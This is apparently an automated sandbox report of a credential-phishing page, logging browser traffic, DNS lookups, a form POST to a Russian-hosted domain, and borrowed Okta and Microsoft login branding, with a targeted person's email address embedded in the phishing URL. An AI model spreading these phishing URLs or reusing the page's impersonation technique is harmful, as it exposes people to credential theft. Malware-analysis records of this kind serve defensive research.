gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IkdseWYxdzJpWGVTMEJydy94MkFEYUE9PSIsInZhbHVlIjoiVDlBTUxyMTdQRGFWdzZhSXNvKzBKUjM5WVFPZ3hER3crN2pEcjFiVUZCL0VSaENmUkxGMEVJNDhQeVAvOVpIS2RRdjRPOVE3OXcraFNBbmluRFA4VWFlZGdZVmhRVW5lelFlQXEzSFQrTjdhSWhmTjhqREQ4OVZmTDNVNlBsRVoiLCJtYWMiOiJkODczY2M4ZGQ1YWE1NjcyNmMxZTFiYmUyYmZhZmY4YTg3ZGM5NjMxZDNlNzQwMTgwYTZmM2Q4ZDQ1MmU1OWUyIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImhtQlplWC81bVVjcEVwSHdEN1hDOUE9PSIsInZhbHVlIjoiOFZGZEdmSDh1NDhuYWprQU8zdFJEd3NQU0FyZExXbTBHUnV1UllEUUVIMHFYOEh0MW1VN2ZEV2tjVnU3Q3JKbEpxRkcvMUpmbjFiZndYR1dXanBKMjFIa2lXNlFvUGF5OVRkV2loL1BLOHNHdStpNU9nS3EzdVNhbDVhRUttby8iLCJtYWMiOiIxMzRjZjM5MWYzMGNmMzBiNzJmOGE4MWNhNTJmYWQwN2Q4NDc3M2U0MDMyOTIyZGYyMzM0YmYzYTdhOWVjOTdiIiwidGFnIjoiIn0%3D
    Source: global trafficHTTP traffic detected: GET /rsvIvTvoLMZ03pS3MwX9LijbSo1tmpSLY8DjCu6chApJIUMh9R9qpcd198 HTTP/1.1Host: encryption-marinha.jkndfuzv.ruConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://encryption-marinha.jkndfuzv.ru/tqrmmkqnkybhgrcpajlvlmkvressy5l3xb609h7xeqsb767nl?YTUSIOUTJWFKEHXUXRYQVBSNXAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IkdseWYxdzJpWGVTMEJydy94MkFEYUE9PSIsInZhbHVlIjoiVDlBTUxyMTdQRGFWdzZhSXNvKzBKUjM5WVFPZ3hER3crN2pEcjFiVUZCL0VSaENmUkxGMEVJNDhQeVAvOVpIS2RRdjRPOVE3OXcraFNBbmluRFA4VWFlZGdZVmhRVW5lelFlQXEzSFQrTjdhSWhmTjhqREQ4OVZmTDNVNlBsRVoiLCJtYWMiOiJkODczY2M4ZGQ1YWE1NjcyNmMxZTFiYmUyYmZhZmY4YTg3ZGM5NjMxZDNlNzQwMTgwYTZmM2Q4ZDQ1MmU1OWUyIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImhtQlplWC81bVVjcEVwSHdEN1hDOUE9PSIsInZhbHVlIjoiOFZGZEdmSDh1NDhuYWprQU8zdFJEd3NQU0FyZExXbTBHUnV1UllEUUVIMHFYOEh0MW1VN2ZEV2tjVnU3Q3JKbEpxRkcvMUpmbjFiZndYR1dXanBKMjFIa2lXNlFvUGF5OVRkV2loL1BLOHNHdStpNU9nS3EzdVNhbDVhRUttby8iLCJtYWMiOiIxMzRjZjM5MWYzMGNmMzBiNzJmOGE4MWNhNTJmYWQwN2Q4NDc3M2U0MDMyOTIyZGYyMzM0YmYzYTdhOWVjOTdiIiwidGFnIjoiIn0%3D
    Source: global trafficHTTP traffic detected: GET /ijgVJ29TdMQnivj8m6zho8fxyrYaNaNm1zHY45bGv8MS12206 HTTP/1.1Host: encryption-marinha.jkndfuzv.ruConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://encryption-marinha.jkndfuzv.ru/tqrmmkqnkybhgrcpajlvlmkvressy5l3xb609h7xeqsb767nl?YTUSIOUTJWFKEHXUXRYQVBSNXAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IkdseWYxdzJpWGVTMEJydy94MkFEYUE9PSIsInZhbHVlIjoiVDlBTUxyMTdQRGFWdzZhSXNvKzBKUjM5WVFPZ3hER3crN2pEcjFiVUZCL0VSaENmUkxGMEVJNDhQeVAvOVpIS2RRdjRPOVE3OXcraFNBbmluRFA4VWFlZGdZVmhRVW5lelFlQXEzSFQrTjdhSWhmTjhqREQ4OVZmTDNVNlBsRVoiLCJtYWMiOiJkODczY2M4ZGQ1YWE1NjcyNmMxZTFiYmUyYmZhZmY4YTg3ZGM5NjMxZDNlNzQwMTgwYTZmM2Q4ZDQ1MmU1OWUyIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImhtQlplWC81bVVjcEVwSHdEN1hDOUE9PSIsInZhbHVlIjoiOFZGZEdmSDh1NDhuYWprQU8zdFJEd3NQU0FyZExXbTBHUnV1UllEUUVIMHFYOEh0MW1VN2ZEV2tjVnU3Q3JKbEpxRkcvMUpmbjFiZndYR1dXanBKMjFIa2lXNlFvUGF5OVRkV2loL1BLOHNHdStpNU9nS3EzdVNhbDVhRUttby8iLCJtYWMiOiIxMzRjZjM5MWYzMGNmMzBiNzJmOGE4MWNhNTJmYWQwN2Q4NDc3M2U0MDMyOTIyZGYyMzM0YmYzYTdhOWVjOTdiIiwidGFnIjoiIn0%3D
    Source: global trafficHTTP traffic detected: GET /qrgnZWTorGwUDt4wh0nteDBlmP12NcjporrrNyuuep9wZWpw6ef236 HTTP/1.1Host: encryption-marinha.jkndfuzv.ruConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://encryption-marinha.jkndfuzv.ru/tqrmmkqnkybhgrcpajlvlmkvressy5l3xb609h7xeqsb767nl?YTUSIOUTJWFKEHXUXRYQVBSNXAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IkdseWYxdzJpWGVTMEJydy94MkFEYUE9PSIsInZhbHVlIjoiVDlBTUxyMTdQRGFWdzZhSXNvKzBKUjM5WVFPZ3hER3crN2pEcjFiVUZCL0VSaENmUkxGMEVJNDhQeVAvOVpIS2RRdjRPOVE3OXcraFNBbmluRFA4VWFlZGdZVmhRVW5lelFlQXEzSFQrTjdhSWhmTjhqREQ4OVZmTDNVNlBsRVoiLCJtYWMiOiJkODczY2M4ZGQ1YWE1NjcyNmMxZTFiYmUyYmZhZmY4YTg3ZGM5NjMxZDNlNzQwMTgwYTZmM2Q4ZDQ1MmU1OWUyIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImhtQlplWC81bVVjcEVwSHdEN1hDOUE9PSIsInZhbHVlIjoiOFZGZEdmSDh1NDhuYWprQU8zdFJEd3NQU0FyZExXbTBHUnV1UllEUUVIMHFYOEh0MW1VN2ZEV2tjVnU3Q3JKbEpxRkcvMUpmbjFiZndYR1dXanBKMjFIa2lXNlFvUGF5OVRkV2loL1BLOHNHdStpNU9nS3EzdVNhbDVhRUttby8iLCJtYWMiOiIxMzRjZjM5MWYzMGNmMzBiNzJmOGE4MWNhNTJmYWQwN2Q4NDc3M2U0MDMyOTIyZGYyMzM0YmYzYTdhOWVjOTdiIiwidGFnIjoiIn0%3D
    Source: global trafficHTTP traffic detected: GET /stLx2AXVud2xlUwbPNljeDAzdhl4A2IPUOzzCg0S5LGrFzfplmnd34wtauD5gunMCnt6yZAef259 HTTP/1.1Host: encryption-marinha.jkndfuzv.ruConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://encryption-marinha.jkndfuzv.ru/tqrmmkqnkybhgrcpajlvlmkvressy5l3xb609h7xeqsb767nl?YTUSIOUTJWFKEHXUXRYQVBSNXAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IkdseWYxdzJpWGVTMEJydy94MkFEYUE9PSIsInZhbHVlIjoiVDlBTUxyMTdQRGFWdzZhSXNvKzBKUjM5WVFPZ3hER3crN2pEcjFiVUZCL0VSaENmUkxGMEVJNDhQeVAvOVpIS2RRdjRPOVE3OXcraFNBbmluRFA4VWFlZGdZVmhRVW5lelFlQXEzSFQrTjdhSWhmTjhqREQ4OVZmTDNVNlBsRVoiLCJtYWMiOiJkODczY2M4ZGQ1YWE1NjcyNmMxZTFiYmUyYmZhZmY4YTg3ZGM5NjMxZDNlNzQwMTgwYTZmM2Q4ZDQ1MmU1OWUyIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImhtQlplWC81bVVjcEVwSHdEN1hDOUE9PSIsInZhbHVlIjoiOFZGZEdmSDh1NDhuYWprQU8zdFJEd3NQU0FyZExXbTBHUnV1UllEUUVIMHFYOEh0MW1VN2ZEV2tjVnU3Q3JKbEpxRkcvMUpmbjFiZndYR1dXanBKMjFIa2lXNlFvUGF5OVRkV2loL1BLOHNHdStpNU9nS3EzdVNhbDVhRUttby8iLCJtYWMiOiIxMzRjZjM5MWYzMGNmMzBiNzJmOGE4MWNhNTJmYWQwN2Q4NDc3M2U0MDMyOTIyZGYyMzM0YmYzYTdhOWVjOTdiIiwidGFnIjoiIn0%3D
    Source: global trafficHTTP traffic detected: GET /fs/bcg/4/gfsh9pi7jcWKJKMAs1t7 HTTP/1.1Host: ok4static.oktacdn.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://encryption-marinha.jkndfuzv.ru/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /v1/ip/geo.json HTTP/1.1Host: get.geojs.ioConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: application/json, text/javascript, */*; q=0.01sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Origin: https://encryption-marinha.jkndfuzv.ruSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://encryption-marinha.jkndfuzv.ru/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /c1c6b6c8-oza7ewv53y3yvexbsc84eiyfwmickr2pstnkwdujq6s/logintenantbranding/0/bannerlogo?ts=636959481277037644 HTTP/1.1Host: aadcdn.msauthimages.netConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://encryption-marinha.jkndfuzv.ru/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /r/gsr1.crl HTTP/1.1Cache-Control: max-age = 3000Connection: Keep-AliveAccept: */*If-Modified-Since: Tue, 07 Jan 2025 07:28:00 GMTUser-Agent: Microsoft-CryptoAPI/10.0Host: c.pki.goog
    Source: global trafficHTTP traffic detected: GET /r/r4.crl HTTP/1.1Cache-Control: max-age = 3000Connection: Keep-AliveAccept: */*If-Modified-Since: Thu, 25 Jul 2024 14:48:00 GMTUser-Agent: Microsoft-CryptoAPI/10.0Host: c.pki.goog
    Source: global trafficDNS traffic detected: DNS query: www.google.com
    Source: global trafficDNS traffic detected: DNS query: encryption-marinha.jkndfuzv.ru
    Source: global trafficDNS traffic detected: DNS query: code.jquery.com
    Source: global trafficDNS traffic detected: DNS query: challenges.cloudflare.com
    Source: global trafficDNS traffic detected: DNS query: cdnjs.cloudflare.com
    Source: global trafficDNS traffic detected: DNS query: developers.cloudflare.com
    Source: global trafficDNS traffic detected: DNS query: jygdt.tjezyf.ru
    Source: global trafficDNS traffic detected: DNS query: a.nel.cloudflare.com
    Source: global trafficDNS traffic detected: DNS query: github.com
    Source: global trafficDNS traffic detected: DNS query: ok4static.oktacdn.com
    Source: global trafficDNS traffic detected: DNS query: objects.githubusercontent.com
    Source: global trafficDNS traffic detected: DNS query: get.geojs.io
    Source: global trafficDNS traffic detected: DNS query: yut0iokyzukehjk5kncud7ry0v0fok7c8jwt70p18hbzykwgi9o.uraleconomic.ru
    Source: global trafficDNS traffic detected: DNS query: aadcdn.msauthimages.net
    Source: unknownHTTP traffic detected: POST /riWV0S6MDUPLu3h0Z0Ci4P37jqadamkj00iFg1oHVLKumIGe7o HTTP/1.1Host: encryption-marinha.jkndfuzv.ruConnection: keep-aliveContent-Length: 777sec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryYHw8A4JYuA1D7ZVUsec-ch-ua-mobile: ?0Accept: */*Origin: https://encryption-marinha.jkndfuzv.ruSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://encryption-marinha.jkndfuzv.ru/PtM2i/$nadia.sofia.rijo@marinha.ptAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IkhyQmc5VDAyN3NXU0E0OG9QdXdYTkE9PSIsInZhbHVlIjoiNnBCQjF6N3JBTTladHZCMW5kRTN3b2RsNU5sODg0bTVtRE9qUDJPVDJRSjVIVGVZSVVRdURhb0RtbXpkTURPaXRaQ2tLSVIvTVdyc2xDU2ZiRGJWVjRRdzVSSGFUVXRCV0haSnErL1pKR1JyUUJJUC95WWRQTWdkWUtGNStXTG0iLCJtYWMiOiJmNzI3YTA4ODI5NGY0MDk4YjhkMTJhYTE1ZmIxZTNlNThmMjNjZTc4MDE1NGVmZWMxNTZiYzcxNjRlMTUzNzU1IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Ik9OZGppNytjQ3MrVmtzczYydzJpR2c9PSIsInZhbHVlIjoiYnNqam9hMTFKTGZiQlVFcVVRT09qam40OWJTY2hXdXNON0VsNGpKbG9nSHh3TWhCK0dXSFdRS0MyVWtTbVMrZGlTdHpBSWVCYW0wRWZLd3dhMmE2KzZsWVVBQkNjeU1MZ2VwVTFvMDNsaUR6RUJRWWR3TVYrRk5ZUXE0VlZDejQiLCJtYWMiOiI3OThiZWRjZWY1MTVhNWJjYzhkY2U4NzY0ZDM3ZjZlMTk1MWNlZjgwMDBkM2FmMTNmMmEwN2YwZjhkMTZiZjE2IiwidGFnIjoiIn0%3D
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 14 Mar 2025 11:30:58 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=u%2F2mk9jj8%2BWPHi0neXmrxvWqgI1lGSmFkhlvUS6bAaUTOwt8tjj836LHDYZIpuyTJT1GYpu5hcb9No5XWJChYS3L09u%2Bms9dilio1EjkXvgdh%2BHYKGrt6sGqO6a%2B"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Vary: Accept-Encodingserver-timing: cfL4;desc="?proto=TCP&rtt=4975&min_rtt=4865&rtt_var=1903&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2826&recv_bytes=2289&delivery_rate=585405&cwnd=251&unsent_bytes=0&cid=69e785c390f55e85&ts=102&x=0"Cache-Control: max-age=14400CF-Cache-Status: MISSServer: cloudflareCF-RAY: 9203712a3f2eefa1-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1781&min_rtt=1776&rtt_var=677&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2825&recv_bytes=1952&delivery_rate=1602634&cwnd=153&unsent_bytes=0&cid=f6013f963acbde34&ts=427&x=0"
    Source: chromecache_64.2.drString found in binary or memory: http://github.com/fent/randexp.js/raw/master/LICENSE
    Source: chromecache_64.2.drString found in binary or memory: https://github.com/fent)
    Source: chromecache_66.2.drString found in binary or memory: https://www.walmart.com
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
    Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
    Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
    Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
    Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
    Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
    Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
    Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
    Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
    Source: unknownNetwork traffic detected: HTTP traffic on port 49671 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
    Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
    Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
    Source: unknownNetwork traffic detected: HTTP traffic on port 49678 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
    Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
    Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
    Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
    Source: unknownHTTPS traffic detected: 142.250.186.68:443 -> 192.168.2.4:49718 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.21.43.175:443 -> 192.168.2.4:49720 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.21.43.175:443 -> 192.168.2.4:49719 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.17.25.14:443 -> 192.168.2.4:49724 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.18.95.41:443 -> 192.168.2.4:49723 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 151.101.66.137:443 -> 192.168.2.4:49722 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.16.2.189:443 -> 192.168.2.4:49727 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 172.67.153.160:443 -> 192.168.2.4:49733 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 35.190.80.1:443 -> 192.168.2.4:49741 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.4:49749 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 13.33.187.14:443 -> 192.168.2.4:49751 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 13.33.187.14:443 -> 192.168.2.4:49750 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.4:49752 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.26.1.100:443 -> 192.168.2.4:49770 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.21.0.223:443 -> 192.168.2.4:49771 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 2.22.242.18:443 -> 192.168.2.4:49772 version: TLS 1.2
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\scoped_dir3940_562915067Jump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile deleted: C:\Windows\SystemTemp\scoped_dir3940_562915067Jump to behavior
    Source: classification engineClassification label: mal48.phis.win@21/68@29/16
    Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2032,i,811636083332308569,11067964146906542817,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=1756 /prefetch:3
    Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://encryption-marinha.jkndfuzv.ru/PtM2i/$nadia.sofia.rijo@marinha.pt"
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2032,i,811636083332308569,11067964146906542817,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=1756 /prefetch:3Jump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
